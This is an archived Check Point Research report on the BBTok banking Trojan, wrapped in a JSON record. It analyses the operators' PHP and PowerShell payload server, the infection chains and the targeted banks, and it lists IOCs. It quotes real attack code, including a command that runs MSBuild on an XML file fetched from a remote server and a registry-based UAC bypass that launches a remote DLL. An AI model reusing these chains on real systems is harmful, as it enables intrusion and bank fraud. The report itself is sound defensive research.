{
	"id": "b29cf643-df1d-4655-ab4a-19bc01e6b37f",
	"created_at": "2026-05-05T02:46:16.459841Z",
	"updated_at": "2026-05-05T02:46:37.169628Z",
	"deleted_at": null,
	"sha1_hash": "4f0595e0f441ec7d4b66741c6ed6878f2d9799b8",
	"title": "Behind the Scenes of BBTok: Analyzing a Banker’s Server Side Components",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 125482,
	"plain_text": "Behind the Scenes of BBTok: Analyzing a Banker’s Server Side Components\r\nBy etal\r\nPublished: 2023-09-20 · Archived: 2026-05-05 02:17:42 UTC\r\n\r\nIntroduction\r\nCheck Point Research recently discovered an active campaign operating and deploying a new variant of the BBTok banker in Latin America. In the research, we highlight newly discovered infection chains that use a unique combination of Living off the Land Binaries (LOLBins). This results in low detection rates, even though the BBTok banker has been operating since at least 2020. As we analyzed the campaign, we came across some of the threat actor’s server-side resources used in the attacks, targeting hundreds of users in Brazil and Mexico.\r\n\r\nThe server-side components are responsible for serving malicious payloads that are likely distributed through phishing links. We’ve observed numerous iterations of the same server-side scripts and configuration files, which demonstrate the evolution of the BBTok banker deployment methods over time. This insight allowed us to catch a glimpse of infection vectors that the actors have not yet implemented, as well as trace the origins of the source code employed for sustaining such operations.\r\n\r\nIn this report, we highlight some of the server-side functionalities of the payload server which are used to distribute the banker. Those allow the operators to generate a unique payload for each victim, produced on the spot when the victim clicks the link.\r\n\r\nKey Findings\r\n1. BBTok continues to be active, targeting users in Brazil and Mexico, employing multi-layered geo-fencing to ensure infected machines are from those countries only.\r\n2. Since the last public reporting on BBTok in 2020, the operators’ tactics, techniques and procedures (TTPs) have evolved significantly, adding additional layers of obfuscation and downloaders, resulting in low detection rates.\r\n3. The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering the 2FA code for their bank accounts or into entering their payment card number.\r\n4. The newly identified payloads are generated by a custom server-side application, responsible for generating unique payloads for each victim based on operating system and location.\r\n5. Analysis of the payload server-side code revealed the actors are actively maintaining diversified infection chains for different versions of Windows. Those chains employ a wide variety of file types, including ISO, ZIP, LNK, DOCX, JS and XLL.\r\n6. The threat actors add open-source code, code from hacking forums, and new exploits when those appear (e.g. Follina) to their arsenal.\r\n\r\nBackground\r\nThe BBTok banker, first revealed in 2020, was deployed in Latin America through fileless attacks. The banker has a wide set of functionalities, including enumerating and killing processes, keyboard and mouse control, and manipulating clipboard contents. Alongside those, BBTok contains classic banking Trojan features, simulating fake login pages for a wide variety of banks operating in Mexico and Brazil.\r\n\r\nSince it was first publicly disclosed, the BBTok operators have adopted new TTPs, all while still primarily utilizing phishing emails with attachments for the initial infection. Recently we’ve seen indications of the banker being distributed through phishing links, and not as attachments to the email itself.\r\n\r\nUpon accessing the malicious link, an ISO or ZIP file is downloaded to the victim’s machine. Those contain an LNK file that kicks off the infection chain, leading to the deployment of the banker while opening a decoy document. Although the process appears to be quite straightforward at first glance, we’ve found evidence that there’s a lot going on behind the scenes.\r\n\r\nWhile analyzing these newly identified links, we’ve uncovered internal server-side resources used to distribute the malware. Looking at those, it became evident the actor has maintained a much wider variety of infection chains, generated on demand with each click, tailored to match the victim’s operating system and location.\r\n\r\nBBTok Banking Hijacks\r\nBBTok gives its operators a wide set of capabilities, ranging from remote commands to classic banking Trojan capabilities. BBTok can replicate the interfaces of multiple Latin American banks. Its code references over 40 major banks in Mexico and Brazil, such as Citibank, Scotiabank, Banco Itaú and HSBC (see Appendix B for the full list of targeted banks). The banker searches for indications of its victims being clients of those banks by iterating over the open windows and names of browser tabs, searching for bank names.\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 1 of 13\r\n\r\nThe default target the banker apparently aims at is BBVA, with the default fake interface aiming to replicate its looks. Posing as legitimate institutions, these fake interfaces coax unsuspecting users into divulging personal and financial details. The focus of this functionality is tricking the victim into entering the security code/token number that serves as 2FA for the bank account, in order to conduct account takeovers of the victim’s bank account. In some cases, this capability also aims to trick the victim into entering their payment card number.\r\n\r\nFigure 1 – Examples of fake interfaces embedded within the BBTok Banker.\r\n\r\nBBTok, which is written in Delphi, uses the Visual Component Library (VCL) to create forms that, quite literally, form these fake interfaces. This allows the attackers to dynamically and naturally generate interfaces that fit the victim’s computer screen and a specific form for the bank of the victim, without raising suspicion. BBVA, which is the default bank the banker targets, has its interface stored in one such form named “TFRMBG”. In addition to banking sites, the attackers have kept up with the times and have also started searching for information regarding Bitcoin on the infected machine, actively looking for strings such as ‘bitcoin’, ‘Electrum’, and ‘binance’.\r\n\r\nBBTok doesn’t stop at visual trickery; it has other capabilities as well. Specifically, it can install a malicious browser extension or inject a DLL named “rpp.dll” to further its hold on the infected system, likely to improve its ability to trick the victims. Those components were not available at the time of analysis.\r\n\r\nWhat’s notable is the operator’s cautious approach: all banking activities are only executed upon direct command from the C2 server, and are not automatically carried out on every infected system.\r\n\r\nPayload Server Analysis\r\nOverview of the Payload Server\r\nTo effectively manage their campaign, the BBTok operators created a unique flow kicked off by the victim clicking a malicious link, likely sent in a phishing email. When a victim clicks the link, it results in the download of either a ZIP archive or an ISO image, depending on the victim’s operating system. Although the process is seamless for the victim, the server generates a unique payload based on parameters found within the request.\r\n\r\nFigure 2 – Server-side components used in BBTok infections.\r\n\r\nThis process is carried out on a XAMPP-based server, and contains three essential components:\r\n1. A PowerShell script that handles payload preparation and contains the main bulk of the logic for creating lure archives.\r\n2. A PHP codebase and database designed to document and manage infections.\r\n3. Auxiliary utilities that enhance the functionality of these components.\r\n\r\nThis is the chain of events:\r\n1. A victim performs an HTTP request to either /baixar, /descargar or /descarga (these paths suggest that the lures are in either Spanish or Portuguese).\r\n2. Based on the .htaccess file, the server handles the request using descarga.php.\r\n3. The scripts utilize the file db.php to store information about the request, including the victim’s fingerprint, in an SQLite database.\r\n4. descarga.php calls ps_gen.ps1 to generate a custom archive, which is eventually delivered to the victim.\r\n\r\nIncoming Requests Handling\r\nThe PHP codebase is composed of the following files:\r\n1. descarga.php / descargar.php – Manages new connections and serves lure documents to the victim’s PC.\r\n2. db.php – Generates and manages the SQLite database that includes the victim’s details.\r\n3. generator.php – Utility class used to generate random links, strings, and other functionalities.\r\n\r\n“Descarga” and “descargar” translate to “download” in Spanish. This file contains the main logic of the infection process. The script itself contains many comments, some of them in plain Spanish and Portuguese, which provide hints as to the attackers’ origin.\r\n\r\nThe script logic:\r\n1. It checks the geolocation of the link-referred victim against ip-api.com and stores it in a file. If the victim isn’t from a targeted country (i.e., Mexico or Brazil) the HTTP connection ends immediately with a 404 message.\r\n\r\n$api = new IpApi();\r\n$whoAmI = $api-\u003eGetInfo($ip);\r\n$allowed = array(\"MX\", \"BR\");\r\nfile_put_contents(\"ips/\".$ip.$whoAmI-\u003ecountryCode, \"\");\r\nif(!in_array($whoAmI-\u003ecountryCode, $allowed)) {\r\n    http_response_code(404);\r\n    die();\r\n}\r\n\r\n2. If the victim passes the check, the script then parses the user agent to get the victim’s Windows OS version.\r\n\r\n$useragent = strtolower(htmlspecialchars($_SERVER['HTTP_USER_AGENT']));\r\n$match = false;\r\n$dfile = \"10\";\r\n$dfiles = array (\r\n    'windows nt 10.0' =\u003e '10',\r\n    'windows nt 6.3' =\u003e '10',\r\n    'windows nt 6.2' =\u003e '10',\r\n    'windows nt 6.1' =\u003e '7',\r\n    'windows nt 6.0' =\u003e '7',\r\n    'windows nt 5.2' =\u003e '7'\r\n);\r\nforeach($dfiles as $os=\u003e$file) {\r\n    if (preg_match('/' . $os . '/i', $useragent)) {\r\n        $match = true;\r\n        $dfile = $file;\r\n        break;\r\n    }\r\n}\r\n\r\n3. It then passes the user agent with the victim’s country code and lure filename to the PowerShell payload generator script.\r\n\r\nPowerShell Payload Generator\r\nThe script ps_gen.ps1 contains the main logic for generating archive payloads, either as ZIP or ISO files. The latest version of the code has a lot of commented-out sections that were likely functional in the past, which suggests they contain additional infection chains and lures. We found multiple versions of the file, some dating back to July 2022, demonstrating that this operation has been ongoing for quite a while.\r\n\r\nOur analysis of the latest version is below. For more details on earlier variations and changes to the script over time, see the section “Earlier Versions.”\r\n\r\nThe generator script is called by descarga.php, using the function DownloadFile with the arguments file_name, ver and cc. These correspond to the generated archive name, the victim’s OS version and the victim’s country code.\r\n\r\nfunction DownloadFile($file_name, $ver, $cc) {\r\n    if($ver == \"10\" )\r\n    {\r\n        $ext = \"iso\";\r\n    } else {\r\n        $ext = \"zip\";\r\n    }\r\n    exec('powershell -ex Bypass -File ./ps_gen.ps1 '.$file_name.' '.$ver.' '.$cc);\r\n    return $file_name.'.'.$ext;\r\n}\r\n\r\nThe code portions utilized in the observed iteration of the server generate the archive payloads based on two parameters:\r\n1. The origin country of the victim – Brazil or Mexico.\r\n2. Operating system extracted from the User-Agent – Windows 10 or 7.\r\n\r\nAccording to the results, the following parameters of the malicious archive are selected:\r\n1. Type of the archive: ISO for Windows 10, ZIP for Windows 7 and others.\r\n2. The name of the DLL file that is used in the next stage changes according to the targeted country: Trammy is used for Brazil, and Gammy is used for Mexico.\r\n3. The archive contains an LNK. The LNK shortcut icon in Windows 10 is the one used by Microsoft Edge, and the one for Windows 7 is the one used by Google Chrome.\r\n4. The final execution logic. For Windows 10 victims, the script executes MSBuild.exe with a file named dat.xml from the server 216[.]250[.]251[.]196, which also stores the malicious DLLs for the next stage. For Windows 7, the payload just downloads the relevant remote DLL via CMD execution.\r\n\r\n$shortcutName = $args[0]\r\n$win = $args[1]\r\n$country = $args[2]\r\n$stegoKey = New-StegoKey 35\r\nif($country -eq \"BR\") {\r\n    $dllName = 'Trammy'\r\n} else {\r\n    $dllName = 'Gammy'\r\n}\r\nif($win -eq \"10\") {\r\n    $wstate = 7\r\n    $shortcutIconLocation = \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\r\n    CopyMSBuild($shortcutName)\r\n} else {\r\n    $wstate = 7\r\n    $shortcutIconLocation = \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\"\r\n}\r\n\r\nAdd-PoshObfuscation\r\nAll payloads are obfuscated using the Add-PoshObfuscation function. A simple search for parts of the code yields a single result from the “benign” site hackforums[.]net, specifically a response from a user named “Qismon” in August 2021. This individual recommends some methods to bypass AMSI and security products, and also shares the PoshObfuscation code:\r\n\r\nFigure 3 – Add-PoshObfuscation() code shared in hackforums[.]net.\r\n\r\nInfection Chains and Final Payload\r\nThe process described above eventually leads to two variations of the infection chain: one for Windows 7 and one for Windows 10. The differences between the two versions can be explained as attempts to avoid newly implemented detection mechanisms such as AMSI.\r\n\r\n*ammy.dll Downloaders\r\nBoth infection chains utilize malicious DLLs named using a similar convention – Trammy, Gammy, Brammy, or Kammy. These are leaner and obfuscated versions of BBTok’s loader that use geofencing to thwart detection before executing any malicious actions. The final payload is a new version of the BBTok banker. As documented previously, BBTok comes packed with multiple additional password-protected software. These allow the actors full access to the infected machine, and additional functionalities.\r\n\r\nWindows 7 Infection Chain\r\nFigure 4 – Windows 7 Infection Chain.\r\nThe infection chain for Windows 7 is not unique and consists of an LNK file stored in a ZIP file. Upon execution, the LNK file runs the *ammy.dll payload using rundll32.exe, which in turn downloads, extracts, and runs the BBTok payload.\r\n\r\nWindows 10 Infection Chain\r\nFigure 5 – Windows 10 Infection Chain.\r\nThe infection chain for Windows 10 is stored in an ISO file containing 3 components: an LNK file, a lure file, and a renamed cmd.exe executable. Clicking the LNK file kicks off the infection chain, using the renamed cmd.exe to run all the commands in the following manner:\r\n\r\nDANFE352023067616112\\DANFE352023067616112.exe /c copy %cd%\\DANFE352023067616112\\DANFE352023067616112.pdf %userprofile%\\DANFE352023067616112.pdf /Y \u0026 start %userprofile%\\DANFE352023067616112.pdf \u0026 C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -nologo \\\\216.250.251.196\\file\\dat.xml\r\n\r\nThe infection chain:\r\n1. Copy the lure file to the folder %userprofile% and open it.\r\nFigure 6 – Lure document dropped in BBTok infection.\r\n2. Run MSBuild.exe to build an application using an XML stored on a remote server, fetched over SMB.\r\n3. MSBuild.exe creates a randomly named DLL, which in turn downloads *ammy.dll from the server and runs it with a renamed rundll32.exe (mmd.exe), as seen in the XML contents:\r\n\r\nprivate void ByFD() {\r\n    String reg = \"/c REG ADD HKCU\\\\Software\\\\Classes\\\\.pwn\\\\Shell\\\\Open\\\\command -ve /d \\\"C:\\\\ProgramData\\\\mmd.exe \\\\\\\\216.250.251.196\\\\file\\\\Trammy.dll, Dacl \u0026 REG DELETE HKCU\\\\Software\\\\Classes\\\\ms-settings /f \u0026 REG DELETE HKCU\\\\Software\\\\Classes\\\\.pwn /f\\\" /f \u0026 REG ADD HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\CurVer -ve /d \\\".pwn\\\" /f \u0026 timeout /t 3 \u003enul \u0026 start /MIN computerdefaults.exe\";\r\n    StartProcess(\"cmd.exe\", reg);\r\n}\r\n\r\n4. The *ammy.dll downloader downloads, extracts, and runs the BBTok payload.\r\n\r\nThe unique combination of renamed CMD, MSBuild, and file fetching over SMB results in a low detection rate for the Windows 10 infection chains.\r\n\r\nEarlier Versions\r\nThroughout our analysis of the BBTok campaign, we came across multiple versions of the artifacts from the payload server. We saw changes in all parts of the operation: the PHP code, the PowerShell script, and other utilities.\r\n\r\nChanges in the PHP Code\r\nLooking at an earlier version of the descarga.php script, we saw a few key differences:\r\n1. Originally, only victims from Mexico were targeted.\r\n2. The IP of a different payload server, 176[.]31[.]159[.]196, was hard-coded in the script.\r\n3. Instead of executing the PowerShell script directly, a script named gen.php was called. We were unable to obtain this script, but believe it simply executed the PowerShell script.\r\n4. The victim’s IP address, user agent, and a flag (jaBaixou, or ‘already downloaded’ in Portuguese) were inserted into a database, using the db.php file. The flag is later checked so as not to serve the same payload twice. As this section is not used in the latest version, it is possible that the attackers found this process cumbersome and decided to trade OPSEC for easier management and a higher chance of infection success.\r\n\r\nModifications of the PowerShell Script\r\nLooking at older versions of the PowerShell script, it was clear that numerous changes were made to the payload and execution chain. Some noteworthy ones include:\r\n1. In the earliest versions of the script, the LNK simply ran a PowerShell script with the arguments -ExecutionPolicy Unrestricted -W hidden -File \\\\%PARAM%[.]supplier[.]serveftp[.]net\\files\\asd.ps1.\r\n2. A later update added the lure PDF, fac.pdf (“fac” is an abbreviation of “factura”, which is “invoice” in Portuguese). This is a legitimate receipt, in Spanish, from the county of Colima in Mexico. Additionally, the payload for Windows 7 victims launched a legitimate Mexican government site, hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html.\r\n3. The newest version we found opens a different legitimate site, hxxps://fazenda[.]gov[.]br, a Brazilian government site. This version also changes the XML file used by MSBuild and changes the name of the DLL reserved for Brazilian targets from Brammy.dll to Trammy.dll.\r\n\r\nUnused Code and Infection Vectors\r\nCertain sections of the code within the PowerShell script were unused, and the server hosted files that were not part of the primary infection flow we discussed. In particular, we did not discover any indication of active usage of the following:\r\n1. ze.docx is a document that exploits the Follina vulnerability (CVE-2022-30190). It is referenced in the PowerShell script in a function named CreateDoc.\r\n2. xll.xll, which is referenced by CreateXLL, is a malicious XLL taken from the open-source project https://github.com/moohax/xllpoc, which implements code execution via Excel.\r\n3. Numerous empty JavaScript files were found on the server, likely to be used by a function named CreateJS. The file referenced in the function, b.js, was empty, so it is unclear whether this function was previously used or was never fully implemented.\r\n4. Multiple bat files were located on the server, each with a different implementation of downloading next stages. These were most likely created by a function named CreateBat, which is commented out in the latest version of the PowerShell script. Most of them are almost identical to the code in the ByFD function we analyzed previously, excluding two noteworthy past iterations:\r\na. The oldest bat file downloaded another PowerShell script as a next stage (which wasn’t publicly available anymore) instead of editing the registry;\r\nb. A later bat file used the fodhelper UAC bypass instead of the computerdefaults one which is currently being used.\r\n\r\nVictimology and Attribution\r\nOur analysis of the server-side component also sheds light on one of the recent campaigns as seen from the threat actors’ side, based on a database we found that documents access to the malicious application. The database is named links.sqlite and is pretty straightforward. It contains over 150 entries, all unique, with the table headers corresponding to the ones created by db.php. Note the use of the Portuguese language in the names of the 4 columns:\r\n1. chave, or key;\r\n2. assunto, or subject;\r\n3. user_agent;\r\n4. baixou, or downloaded.\r\nThe column named chave contained the IP addresses of the victims, and the column assunto was empty:\r\nFigure 7 – links.sqlite database.\r\nFigure 8 – Attack region.\r\nAs the server code was never meant to be seen by anyone except the threat actors, and it contained numerous comments in Portuguese, we believe this indicates with high probability that the threat actors are Brazilian; Brazil is known for its active banking malware ecosystem.\r\n\r\nConclusion\r\nAlthough BBTok has been able to remain under the radar due to its elusive techniques and targeting victims only in Mexico and Brazil, it’s evident that it is still actively deployed. Due to its many capabilities, and its unique and creative delivery method involving LNK files, SMB and MSBuild, it still poses a danger to organizations and individuals in the region.\r\n\r\nIt is rare for security researchers to get an up-close look at the attackers’ workbench, and even rarer to get glimpses of it as it evolved over time. What we saw reinforces our belief that all threat actors, including financially motivated ones, are constantly evolving and improving their methods, as well as following new security trends and trying out fresh ideas and opportunities. To keep up and protect against future attacks, security researchers must do the same.\r\n\r\nCheck Point Protections\r\nCheck Point Threat Emulation:\r\nBanker.Wins.BBTok.A\r\nBanker.Win.BBTok.B\r\nTechnique.Wins.SuxXll.A\r\nTrojan.Win.XllAddings.A\r\nHarmony Endpoint:\r\nTrojan.Win.Generic.AQ\r\nTrojan.Win.Generic.AR\r\n\r\nAppendix A – IOCs\r\nNetwork Indicators\r\nName – Description\r\ndanfe[.]is-certified[.]com – Phishing Domain\r\nrendinfo[.]shop – Phishing Domain\r\nsodkvsodkv[.]supplier[.]serveftp[.]net – Malicious DLL Download Domain\r\n216[.]250[.]251[.]196 – Payload Server\r\n173[.]249[.]196[.]195 – Payload Server\r\n176[.]31[.]159[.]196 – Payload Server\r\n147[.]124[.]213[.]152 – Payload Server\r\n\r\nAppendix B – List of Targeted Banks\r\nBanking Caixa CCB Brasil\r\nBanco Itaú Mercantil do Brasil\r\nSantander BANCO PAULISTA\r\nGetnet Banco Daycoval\r\nSicredi Mercado Pago\r\nSicoob Nubank\r\nCitibank Brasil C6 Bank\r\nInternet Banking BNB Internet Banking Inter\r\nUnicred Portal Bancoob\r\nBanco da Amazonia BBVA\r\nBanestes Banorte\r\nBanco Alfa HSBC\r\nBanpará Banamex\r\nBanese Bajio\r\nBRB Banknet Scotiabank\r\nBanco Intermedium Afirme\r\nBanco Topázio Banregio\r\nUniprime Azteca\r\nCooperativa de Crédito – CrediSIS Multiva\r\nBanco Original Inbursa\r\nBanco Fibra CiBanco\r\nBradesco Despachantes e Auto Escola – Cidadetran Sicoobnet\r\nNavegador Exclusivo Banco do Brasil\r\n\r\nSource: https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
	],
	"report_names": [
		"behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components"
	],
	"threat_actors": [],
	"ts_created_at": 1777949176,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f0595e0f441ec7d4b66741c6ed6878f2d9799b8.pdf",
		"text": "https://archive.orkl.eu/4f0595e0f441ec7d4b66741c6ed6878f2d9799b8.txt",
		"img": "https://archive.orkl.eu/4f0595e0f441ec7d4b66741c6ed6878f2d9799b8.jpg"
	}
}